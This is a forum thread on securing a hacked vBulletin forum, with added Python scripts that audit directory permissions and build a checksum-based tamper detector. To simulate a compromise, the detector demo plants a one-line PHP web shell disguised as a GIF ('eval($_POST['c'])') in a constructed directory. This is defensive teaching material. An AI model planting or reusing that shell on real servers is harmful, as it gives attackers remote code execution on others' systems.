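Added example, not code from the thread or from TECK's tutorial: an audit script for the point made above. It walks a web root and reports world-writable (0777-style) directories and files, PHP files sitting inside world-writable directories (where anyone who can write can also execute), and a world-readable includes/config.php; `plan_hardening` lists what chmod 0750 on directories and 0640 on files would change, and applies it only when asked. The tree it audits is constructed. Changing the owner (TECK's nologinuser:root) needs root and is left to the admin.

```python
"""Audit a web root for world-writable directories and plan the chmod fix.

Added example, not code from the thread. Directories PHP must write to (attachments,
customavatars) still work at 0750 when the PHP user owns them, which is why the
chmod advice above is paired with chown.
"""
import os
import stat
import tempfile

DIR_MODE = 0o750
FILE_MODE = 0o640
CODE_EXTS = (".php", ".phtml", ".inc")


def audit_permissions(root: str) -> dict:
    """Walk `root` and collect permission problems as paths relative to root."""
    report = {"world_writable_dirs": [], "world_writable_files": [],
              "php_in_writable_dirs": [], "world_readable_config": []}
    for dirpath, _dirs, filenames in os.walk(root):
        dir_ww = bool(os.stat(dirpath).st_mode & stat.S_IWOTH)
        if dir_ww:
            report["world_writable_dirs"].append(os.path.relpath(dirpath, root))
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            mode = os.stat(full).st_mode
            rel = os.path.relpath(full, root)
            if mode & stat.S_IWOTH:
                report["world_writable_files"].append(rel)
            if dir_ww and fn.lower().endswith(CODE_EXTS):
                report["php_in_writable_dirs"].append(rel)  # writable + executable = shell drop zone
            if fn == "config.php" and mode & stat.S_IROTH:
                report["world_readable_config"].append(rel)  # DB credentials readable by any local user
    return {k: sorted(v) for k, v in report.items()}


def plan_hardening(root: str, apply: bool = False) -> list:
    """Return (relative path, current mode, wanted mode) for every entry off target."""
    changes = []
    for dirpath, _dirs, filenames in os.walk(root):
        targets = [(dirpath, DIR_MODE)] + [(os.path.join(dirpath, f), FILE_MODE) for f in filenames]
        for path, want in targets:
            have = stat.S_IMODE(os.stat(path).st_mode)
            if have != want:
                changes.append((os.path.relpath(path, root), oct(have), oct(want)))
                if apply:
                    os.chmod(path, want)
    return changes


def build_sample_tree() -> str:
    """Constructed vBulletin-like tree with the classic mistakes baked in."""
    root = tempfile.mkdtemp(prefix="vbroot_")  # mkdtemp creates it 0700
    layout = {  # relative dir: (dir mode, {file: mode})
        "includes": (0o755, {"config.php": 0o644, "functions.php": 0o644}),
        "images": (0o755, {}),
        "images/smilies": (0o777, {"smile.gif": 0o666, "x.php": 0o644}),
        "attachments": (0o777, {}),
        "clientscript": (0o755, {"vbulletin_global.js": 0o644}),
    }
    for rel, (dmode, files) in layout.items():
        d = os.path.join(root, rel)
        os.makedirs(d, exist_ok=True)
        for fn, fmode in files.items():
            p = os.path.join(d, fn)
            with open(p, "w") as fh:
                fh.write("<?php // constructed\n" if fn.endswith(".php") else "x\n")
            os.chmod(p, fmode)
        os.chmod(d, dmode)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for key, paths in audit_permissions(root).items():
        print(key, paths)
    for change in plan_hardening(root):
        print("chmod", change[2], change[0], "(was", change[1] + ")")
```

Run the dry run first and read the list; a directory that PHP genuinely writes to must get its owner changed to the PHP user before the 0750 is applied, or uploads break.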

chloe101
07-27-2009, 08:02 PM
The hacker does not use a /tmp dir to hack your forum. He takes advantage of your 0777-chmoded dirs in vB to screw you nice.
I posted this issue a long time ago but people thought I'm crazy. I even wrote a tutorial on this site on how to secure vB... Put it this way: you have a 0777 dir in your /var/www/html (or whatever is the web root)? You can be hacked, very easily.

Read this article (https://vborg.vbsupport.ru/showthread.php?t=148209) I wrote a long time ago... probably nobody read it.
Then secure the current 0777 dirs the same way, not just the config file. Chmod them to 0750 and have them owned by nologinuser:root.

Thank you!

knucklenitz
09-25-2009, 04:20 AM
Teck-

Just to make sure I understand, moving the config.php to another directory out of the public html will not affect vb operation?

I was just hacked yesterday and confirmed that it was some sort of database insertion, based on that when I restored a backup database, the hack was cleared. I wasn't able to find any files with changed dates.

Is there some other way, other than the hacker breaking the config.php, that they could manipulate the database?

Note that I also have htaccess on all pertinent directories.

Thanks!

Paul M
09-25-2009, 10:26 AM
Is there some other way, other that the hacker breaking the config.php that they could manipulate the database?
Yes, you could have a modification installed that is open to SQL injection attack. This is the most likely method.

Angel-Wings
09-26-2009, 12:58 PM
Just to make sure I understand, moving the config.php to another directory out of the public html will not affect vb operation?

This won't increase security at all, for the simple fact that your VB still needs to be able to read that file. So you may move it around on the filesystem, but you still need a way for VB to read it, either by symlinking or something else.
If that is done, every "hacker" will be able to read that file as well.

Better spend your time keeping your VB & Plugins up-to-date and use things like mod_security / suhosin and the typical setups like chroot / jail. That's more time consuming but no "security by obscurity" when moving some files just to have a work-around that VB can read them.

And make sure your VB files aren't writeable by PHP itself. If you store uploads in the filesystem, move that directory outside the webroot. Additionally, some directories like images / signaturepics don't need PHP, because only images are stored there.

Something simple like:


<DirectoryMatch "^/where_ever_your_vb_is_stored/(clientscript|cpstyles|customavatars...)">
    php_flag engine off
</DirectoryMatch>

<Directory /where_ever_your_vb_is_stored/includes>
    <Files "config.php">
        Order deny,allow
        Deny from all
        Allow from 127.0.0.1
    </Files>
</Directory>


Then move the "uploads" directory outside the webroot so that it can't be accessed directly.
Finally - mod_security & suhosin should be used. First starting them both in logging mode to collect a whitelist, highly depends on how your forum is used, and once that whitelist is completed to sort out false-positives set both in blocking mode.

And - as a last addition - you can set up an IDS system that creates checksums of your VB files and alerts you if there are any changes.

Yes - I can do this ;) It won't even cost much ;)
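Added example, not code from the thread: the checksum-based IDS idea from the post above, in a minimal form. `build_manifest` records a SHA-256 per file, `diff_manifests` reports added, removed and modified paths, and `demo` constructs a tree, saves a baseline outside the web root, then simulates the compromise described earlier in this thread (a PHP prefix prepended to index.php and a PHP file dropped into a smilies directory). Directories that change legitimately (attachments, avatars) are skipped by name; the directory names and file contents are constructed.

```python
"""Checksum baseline for a vBulletin tree and a diff against it.

Added example, not code from the thread. Keep the baseline off the web root (ideally
off the box), and refresh it right after every legitimate upgrade.
"""
import hashlib
import json
import os
import tempfile

DEFAULT_EXCLUDE = ("attachments", "customavatars", "customprofilepics", "signaturepics")


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str, exclude=DEFAULT_EXCLUDE) -> dict:
    """Map each file (path relative to root) to its SHA-256, skipping `exclude` directories."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in exclude]  # prune in place
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def diff_manifests(baseline: dict, current: dict) -> dict:
    common = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def save_manifest(manifest: dict, path: str) -> None:
    with open(path, "w") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path: str) -> dict:
    with open(path) as fh:
        return json.load(fh)


def _write(root: str, rel: str, content: str, prepend: bool = False) -> None:
    """Write a file under root; with prepend=True, put `content` in front of the existing text."""
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    old = open(full).read() if prepend and os.path.exists(full) else ""
    with open(full, "w") as fh:
        fh.write(content + old)


def demo() -> dict:
    """Baseline a constructed tree, tamper with it the way the thread describes, diff."""
    root = tempfile.mkdtemp(prefix="vb_")
    _write(root, "index.php", "<?php\necho 'forum';\n")
    _write(root, "includes/config.php", "<?php\n$config = array();\n")
    _write(root, "attachments/1.attach", "legitimate upload\n")
    baseline = os.path.join(tempfile.mkdtemp(prefix="baseline_"), "manifest.json")  # not under the web root
    save_manifest(build_manifest(root), baseline)
    # Simulated compromise: prefix injected into index.php, PHP dropped as a "smilie".
    _write(root, "index.php", "<?php /* constructed injected prefix */ ?>", prepend=True)
    _write(root, "images/smilies/x.gif", "GIF89a<?php eval($_POST['c']); ?>")
    _write(root, "attachments/2.attach", "another upload\n")  # ignored: excluded directory
    return diff_manifests(load_manifest(baseline), build_manifest(root))


if __name__ == "__main__":
    print(demo())
```

The excluded directories are exactly where a dropped file will not be noticed by this check, so pair it with the content scanner run over those paths, or with PHP disabled there as the post suggests.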

knucklenitz
09-26-2009, 03:14 PM
I hate to hjack this thread but Angel-Wings has got my attention.

I found that the person that attacked with SQL injection came from overseas, I am in the US. Since ALL of my traffic is actually on the west coast, I used htaccess to block all but US traffic. Appears to be working so far according to my logs.

On the SQL injection note, I restored my backup database so the hacked database is gone. I have contacted the programmer of the only two mods I have installed and he indicated they work at the admincp level, so injection isn't possible. Since I'm a newbie in this area, I can't confirm. Is there any way to track database activity so I can find out how they got in?

It appears the last two actions (many other http/file.php attempts before that) were the hacker going to sendmessage.php and then 45 minutes later, them going to the index probably to check that their hack worked. I have since disabled the sendmessage.php in the contact vb options.

Thanks for any input.

snakes1100
09-26-2009, 03:56 PM
If you had done as I posted in your own thread, you wouldn't have needed to restore a backup.

1. You should have upgraded vB, hacks/addons, the server backend and anything else outdated.
2. Symlinking your config.php isn't going to stop the hacker either.
3. Blocking foreign-based IPs isn't going to stop him either.

Seeing as you still present the injection hole for him to use, he will be back to visit you again.

Angel-Wings
09-26-2009, 04:23 PM
I found that the person that attacked with SQL injection came from overseas, I am in the US. Since ALL of my traffic is actually on the west coast, I used htaccess to block all but US traffic. Appears to be working so far according to my logs.

And the logs just say the attacker isn't coming from the US West coast? Well, in a world of botnets and open proxies it's maybe just a matter of time until the attacker finds an IP that isn't blocked.
Maybe better spend your time fixing the holes - if I don't lock the door and just paste a huge poster over it, the door itself isn't more "secure", and this "door" is the problem, not how to hide it from someone.

On the SQL injection note, I restored my backup database so the hacked database is gone. I have contacted the programmer of the only two mods I have installed and he indicated they work at the admincp level, so injection isn't possible. Since I'm a newbie in this area, I can't confirm. Is there any way to track database activity so I can find out how they got in?

You can enable the Query log in your Database but this might be a performance issue. Also protecting the Admin & Mod Panel with an Auth won't hurt - just ensure the login user and password aren't written somewhere at your board.

It appears the last two actions (many other http/file.php attempts before that) were the hacker going to sendmessage.php and then 45 minutes later, them going to the index probably to check that their hack worked. I have since disabled the sendmessage.php in the contact vb options.

Can also be the usual "background noise" like automatic IP scans for holes in the all-time-favorites like Joomla, phpMyAdmin, Horde and some older VB holes. Dunno how the attacking people(s) read their attack logs, maybe they just filtered for 200 replies and so wanted to see if they did any damage.
Right now, try to find out how it happened and fix the hole. Then things like IP Range blocking can be done anyways - first get the system clean and up-to-date - then additional enhancements can be done. :)

knucklenitz
09-26-2009, 05:12 PM
If you had done as I posted in your own thread, you wouldn't have needed to restore a backup.

1. You should have upgraded vB, hacks/addons, the server backend and anything else outdated.
2. Symlinking your config.php isn't going to stop the hacker either.
3. Blocking foreign-based IPs isn't going to stop him either.

Seeing as you still present the injection hole for him to use, he will be back to visit you again.

I spoke with the programmer of the two mods. He indicated these mods are not accessible from anywhere but the admincp. I am not a programmer so I can't confirm. The guy has a good reputation but who can you really trust.

I am at 3.8.3 [EDIT: Actually 3.8.2]. I am not sure that 3.8.4 has any security fixes in it. I'll double check. I believe my host has the server up to date. Again, I'll double check.

I can't see how just updating as you suggested would have removed the hack they injected without me restoring the backup (note that this was a database restore only, not entire system). No matter what I did, it showed a disturbing picture and hackers text. It seems that would be in the database no matter what updates were performed.

And the logs just say the attacker isn't coming from the US West coast? Well, in a world of botnets and open proxies it's maybe just a matter of time until the attacker finds an IP that isn't blocked.
Maybe better spend your time fixing the holes - if I don't lock the door and just paste a huge poster over it, the door itself isn't more "secure", and this "door" is the problem, not how to hide it from someone.

I figured this wasn't a fix but a band-aid until I got the hole fixed. I also have some code in the htaccess to deny proxy and other items. Found it online and learning as I go, hope it works.

RewriteEngine on
RewriteCond %{HTTP:VIA} !^$ [OR]
RewriteCond %{HTTP:FORWARDED} !^$ [OR]
RewriteCond %{HTTP:USERAGENT_VIA} !^$ [OR]
RewriteCond %{HTTP:X_FORWARDED_FOR} !^$ [OR]
RewriteCond %{HTTP:PROXY_CONNECTION} !^$ [OR]
RewriteCond %{HTTP:XPROXY_CONNECTION} !^$ [OR]
RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]
RewriteCond %{HTTP:HTTP_CLIENT_IP} !^$
RewriteRule ^(.*)$ - [F]


You can enable the Query log in your Database but this might be a performance issue. Also protecting the Admin & Mod Panel with an Auth won't hurt - just ensure the login user and password aren't written somewhere at your board.

I have htaccess for the admin and mod CP that requires authentication.

Can also be the usual "background noise" like automatic IP scans for holes in the all-time-favorites like Joomla, phpMyAdmin, Horde and some older VB holes. Dunno how the attacking people(s) read their attack logs, maybe they just filtered for 200 replies and so wanted to see if they did any damage.
Right now, try to find out how it happened and fix the hole. Then things like IP Range blocking can be done anyways - first get the system clean and up-to-date - then additional enhancements can be done. :)

I guess I am taking the right steps, just out of order. I'm still at a loss for figuring out how they 'injected' in the first place. Please forgive my ignorance. From what I've read, VBulletin is pretty secure against injection as long as there aren't any mods. Is this a fact? I am using the VB default style so it shouldn't be an issue there. How would I be able to tell if the two mods I have are not secure?

Thanks again for input.

CarlitoBrigante
09-26-2009, 05:38 PM
We had about a dozen cases in the past week from our clients of websites with vBulletin that were hacked. Anyhow, it turned out all of them had been hacked through a Wordpress installed on the server. Some of our clients had old WP installations they had forgotten about, others did not upgrade as they were recommended to, and script kids entered through WP, took the passwd file, and decrypted passwords, gaining FTP access.

There are many ways to prevent this; keep your system always updated; keep your applications always updated; and then do everything you can to secure your system. The best way to prevent attacks that write files to a directory to execute them is to have a system like SELinux in place, or GRSecurity. There are wonderful linux distributions that, for a few bucks per year, provide a secured kernel with many layers of protection applied - from modsecurity to granular permissions, and everything in between.

snakes1100
09-26-2009, 05:42 PM
The reason I stated you didn't need to restore from a backup is that you could have just removed the code they injected, which was likely base64 code in a template, most likely spacer_open.

As stated, you haven't plugged the hole, and you're not going to stop him from revisiting your forum by doing an IP block or symlinking your config file.

Unless you know for sure that everything on your site/server is secure, you're at risk.

@Carlito, excellent point on the WP, that's why I told him everything needs to be upgraded.

knucklenitz
09-26-2009, 08:53 PM
The reason I stated you didn't need to restore from a backup is that you could have just removed the code they injected, which was likely base64 code in a template, most likely spacer_open.

As stated, you haven't plugged the hole, and you're not going to stop him from revisiting your forum by doing an IP block or symlinking your config file.

Unless you know for sure that everything on your site/server is secure, you're at risk.

@Carlito, excellent point on the WP, that's why I told him everything needs to be upgraded.

I see. I'm learning as I go here.

I just upgraded to 3.8.4. I'm not familiar with the coding of databases. Is it something I can check now to see if there is a hole and the 'base64 code into a template, most likely spacer_open' can be used again? How does one check for these vulnerabilities?

No Wordpress on my side, but I did talk to my host, and this being a shared server, I guess there is always a possibility of someone hacking another database or application on the other virtuals and affecting my system?

Angel-Wings
09-26-2009, 09:41 PM
No Wordpress on my side but I did talk to my host and this being a shared server, I guess there is always a possiblity of someone hacking another database or application on the other virtuals and affecting my system?

Well - if that's the case then it's the hoster's fault for not separating client websites enough - it's possible for one "hacked" website to access all other sites.
Really depends on how their machines are configured so blaming them might be too early - still yes, it's possible.
Hope you still have the logs saved - maybe they'll like to see them for analysis.

Oh - and your htaccess just blocks proxies that shout out to the world that they are proxies. No "real" hacker would use such anyway.
Like said - really recommend mod_sec to block things you don't want - beginning with direct IP access and ending with filtering bad useragents or injection attacks.